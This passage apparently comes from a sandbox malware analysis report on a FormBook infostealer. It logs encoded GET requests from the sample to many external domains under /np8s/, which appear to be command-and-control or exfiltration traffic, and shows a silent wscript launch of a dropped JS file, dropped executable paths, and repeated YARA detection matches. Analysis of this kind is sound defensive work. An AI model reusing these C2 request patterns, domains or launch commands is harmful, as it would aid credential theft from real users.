Source: global traffic HTTP traffic detected: GET /np8s/?zVB=LP9EI17xKnNeim8nLd+KxbxmCUjQ+ejx+5/wYAWzXpI6ry2rccLFMoZPirUOcSWhDiha&4hM4=o4B0f HTTP/1.1Host: www.84866.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=VOk/KoOKPmyFTHQXWsNAO627WiKHMN6hKQrMVwJFQe1euvxAvAuscpxAvIMnAXbQu1P/ HTTP/1.1Host: www.sekolahkejepang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=MO+mSdLLrNuwRQYoVJuGLv0I5Vniy3FD6QWfbcj4un1GXTVLdefusF8/o4IGo+fIW5Ou&4hM4=o4B0f HTTP/1.1Host: www.refreshertowels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=vppS5AedQQffRlEeclZ7feN7VEirdPdpHk1lk+jbM2J+jzoAXquLk4CVs1G32f+Ix1mc&4hM4=o4B0f HTTP/1.1Host: www.medyumgalip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=/pe3of3KthlHX+AZdE40oBjh24oMUm2DhTWzf9+6lBsOaTWyqOSb4stDRDmzQmtt1180&4hM4=o4B0f HTTP/1.1Host: www.halecamilla.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=OAQ8ZAk71VYHsoGBQeS0cLLvyBMKMlAsSK0ta2CkcQgnl+jMatCDHwZEkBjakU6FhLRf HTTP/1.1Host: www.ratebill.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMINrnM1Idbq&4hM4=o4B0f HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo1SUrSQk5nZl HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=uZkZa9PDR+t76IUsjgXNksX18rdkaBR0jzgf+2QyrrE0BTZPOy5IBVEfZpk90w8gWC7R HTTP/1.1Host: www.localbloom.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=SjFSW0qH8X1Gu/+4r88YNPSLQa2KKx1h4LPt291Cc0nRXdmgbio7b0swgMzU3Pebjd8T&4hM4=o4B0f HTTP/1.1Host: www.brawlhallacodestore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=xL/YlJAUY6uB/cHSlkc/r5VaZJ7uMa0kbAtysG6BLnWT6huomjvuhq3RLtT5uw3RUbD6 HTTP/1.1Host: www.pdwfifi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=0fJNa1pbsGGBLLIqJIKrQqKQ2B2XPA1kKZrGWkGMUEET6sTbN1/jKODkGG9Xc1lZm5PZ&4hM4=o4B0f HTTP/1.1Host: www.68chengxinle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=MO+mSdLLrNuwRQYoVJuGLv0I5Vniy3FD6QWfbcj4un1GXTVLdefusF8/o4IGo+fIW5Ou&CTr8g=z48HVPSHfp HTTP/1.1Host: www.refreshertowels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=5R3gKgAJtID3s3glssHXeRhFadAM4oJIjGTDo+g9ImvY9tNBMPSBarPOG5Bgot7e+72k&CTr8g=z48HVPSHfp HTTP/1.1Host: www.muddybootslife.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=LP9EI17xKnNeim8nLd+KxbxmCUjQ+ejx+5/wYAWzXpI6ry2rccLFMoZPirUOcSWhDiha&CTr8g=z48HVPSHfp HTTP/1.1Host: www.84866.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=uZkZa9PDR+t76IUsjgXNksX18rdkaBR0jzgf+2QyrrE0BTZPOy5IBVEfZpk90w8gWC7R&CTr8g=z48HVPSHfp HTTP/1.1Host: www.localbloom.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=OAQ8ZAk71VYHsoGBQeS0cLLvyBMKMlAsSK0ta2CkcQgnl+jMatCDHwZEkBjakU6FhLRf HTTP/1.1Host: www.ratebill.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMINrnM1Idbq&4hM4=o4B0f HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo1SUrSQk5nZl HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Creates a DirectInput object (often for capturing keystrokes)
Source: oxx7nkdv4g8.exe, 00000017.00000002.891742293.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.bin.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.bin.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000000.888258763.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577518053.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577466338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577252910.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.539227750.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.981077246.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000001.447624352.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1028333019.0000000004867000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.972949650.0000000000484000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.891623399.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.451386308.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887276277.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.447599993.000001C6B5DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.515738987.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887613995.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.447905033.000001C6B609A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.982531208.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.447458593.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.959879577.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.455268485.000001C6B6770000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.452309362.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.454366130.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448608329.000001C6B5E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887927975.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 23.0.oxx7nkdv4g8.exe.8d0000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 23.0.oxx7nkdv4g8.exe.8d0000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 23.0.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 23.0.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.bin.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.bin.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 23.0.oxx7nkdv4g8.exe.8d0000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 23.0.oxx7nkdv4g8.exe.8d0000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.bin.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.bin.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 23.0.oxx7nkdv4g8.exe.8d0000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 23.0.oxx7nkdv4g8.exe.8d0000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 23.2.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 23.2.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000000.888258763.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000000.888258763.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.577518053.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.577518053.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.577466338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.577466338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.577252910.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.577252910.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.539227750.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.539227750.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.981077246.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.981077246.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000001.447624352.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000001.447624352.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.1028333019.0000000004867000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.1028333019.0000000004867000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.972949650.0000000000484000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.972949650.0000000000484000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.891623399.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.891623399.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.451386308.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.451386308.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000000.887276277.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000000.887276277.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.447599993.000001C6B5DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.447599993.000001C6B5DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.515738987.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.515738987.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000000.887613995.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000000.887613995.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.447905033.000001C6B609A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.447905033.000001C6B609A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.982531208.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.982531208.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.447458593.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.447458593.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.959879577.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.959879577.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.455268485.000001C6B6770000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.455268485.000001C6B6770000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.452309362.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.452309362.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.454366130.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.454366130.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.448608329.000001C6B5E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.448608329.000001C6B5E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000000.887927975.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000000.887927975.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Wscript called in batch mode (surpress errors)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\wtheeNaAZG.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\wtheeNaAZG.js Jump to behavior
Yara signature match
Source: 23.0.oxx7nkdv4g8.exe.8d0000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 23.0.oxx7nkdv4g8.exe.8d0000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 23.0.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 23.0.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.bin.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.bin.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 23.0.oxx7nkdv4g8.exe.8d0000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 23.0.oxx7nkdv4g8.exe.8d0000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.bin.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.bin.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 23.0.oxx7nkdv4g8.exe.8d0000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 23.0.oxx7nkdv4g8.exe.8d0000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 23.2.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 23.2.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000000.888258763.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000000.888258763.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.577518053.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.577518053.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.577466338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
